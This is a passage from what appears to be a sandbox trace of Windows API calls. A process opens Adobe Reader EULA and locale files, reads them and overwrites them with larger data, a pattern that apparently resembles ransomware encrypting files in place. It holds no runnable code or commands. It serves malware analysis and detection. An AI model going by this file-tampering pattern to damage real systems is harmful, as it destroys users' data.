(in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xa2c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa2c, lpOverlapped=0x0) returned 1 [0070.164] CloseHandle (hObject=0x1fc) returned 1 [0070.165] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.166] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.166] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x514 [0070.167] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.167] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.167] ReleaseMutex (hMutex=0x168) returned 1 [0070.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.167] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f3c368, nNumberOfBytesToRead=0x514, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3c368*, lpNumberOfBytesRead=0x2e9f2bc*=0x514, lpOverlapped=0x0) returned 1 [0070.193] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0070.193] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xa9c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa9c, lpOverlapped=0x0) returned 1 [0070.193] CloseHandle (hObject=0x1fc) returned 1 [0070.195] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.195] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.195] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4d6 [0070.196] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.196] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.196] ReleaseMutex (hMutex=0x168) returned 1 [0070.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.196] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.196] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93898, nNumberOfBytesToRead=0x4d6, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93898*, lpNumberOfBytesRead=0x2e9f2bc*=0x4d6, lpOverlapped=0x0) returned 1 [0070.512] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0070.526] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eaab88*, nNumberOfBytesToWrite=0xa5e, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eaab88*, lpNumberOfBytesWritten=0x2e9f2d0*=0xa5e, lpOverlapped=0x0) returned 1 [0070.526] CloseHandle (hObject=0x1fc) returned 1 [0070.527] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.528] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.528] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x402 [0070.528] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.528] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.528] ReleaseMutex (hMutex=0x168) returned 1 [0070.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.529] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x402, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2e9f2bc*=0x402, lpOverlapped=0x0) returned 1 [0070.531] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0070.531] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x98a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x98a, lpOverlapped=0x0) returned 1 [0070.531] CloseHandle (hObject=0x1fc) returned 1 [0070.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\accessibility.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.534] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.534] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb000 [0070.534] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.534] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.534] ReleaseMutex (hMutex=0x168) returned 1 [0070.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CAT", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CAT", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.CAT", lpUsedDefaultChar=0x0) returned 17 [0070.535] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0070.537] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa000 [0070.537] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.538] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xa000 [0070.538] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.539] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0070.539] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.539] CloseHandle (hObject=0x1fc) returned 1 [0070.546] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\eBook.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ebook.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.547] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.547] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1a00 [0070.548] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.548] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.548] ReleaseMutex (hMutex=0x168) returned 1 [0070.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CAT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CAT", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.CAT", lpUsedDefaultChar=0x0) returned 9 [0070.548] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0070.550] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0070.550] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668b68*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668b68*, lpNumberOfBytesWritten=0x2e9f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0070.550] CloseHandle (hObject=0x1fc) returned 1 [0070.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\ReadOutLoud.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\readoutloud.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.552] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.553] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2c00 [0070.553] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.553] ReleaseMutex (hMutex=0x168) returned 1 [0070.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CAT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0070.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.CAT", cchWideChar=15, lpMultiByteStr=0x1f7342c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.CAT", lpUsedDefaultChar=0x0) returned 15 [0070.553] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.556] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1c00 [0070.557] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.557] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1c00 [0070.557] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.558] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0070.558] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.558] CloseHandle (hObject=0x1fc) returned 1 [0070.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\updater.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\updater.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.561] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.562] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2a00 [0070.562] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.562] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.562] ReleaseMutex (hMutex=0x168) returned 1 [0070.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CAT", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.CAT", lpUsedDefaultChar=0x0) returned 11 [0070.562] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.564] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0070.564] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.565] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1a00 [0070.565] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.565] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0070.565] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.566] CloseHandle (hObject=0x1fc) returned 1 [0070.568] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\DigSig.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\digsig.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.568] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.569] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e000 [0070.569] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.569] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.569] ReleaseMutex (hMutex=0x168) returned 1 [0070.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CZE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CZE", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.CZE", lpUsedDefaultChar=0x0) returned 10 [0070.569] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0070.572] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1d000 [0070.572] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.572] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1d000 [0070.573] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.573] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0070.573] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.573] CloseHandle (hObject=0x1fc) returned 1 [0070.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\PPKLite.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ppklite.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0070.576] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.577] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7d000 [0070.577] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0070.577] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.577] ReleaseMutex (hMutex=0x168) returned 1 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.CZE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.577] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.CZE", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.CZE", lpUsedDefaultChar=0x0) returned 11 [0070.577] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0070.580] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7c000 [0070.580] ReadFile (in: hFile=0x1fc, 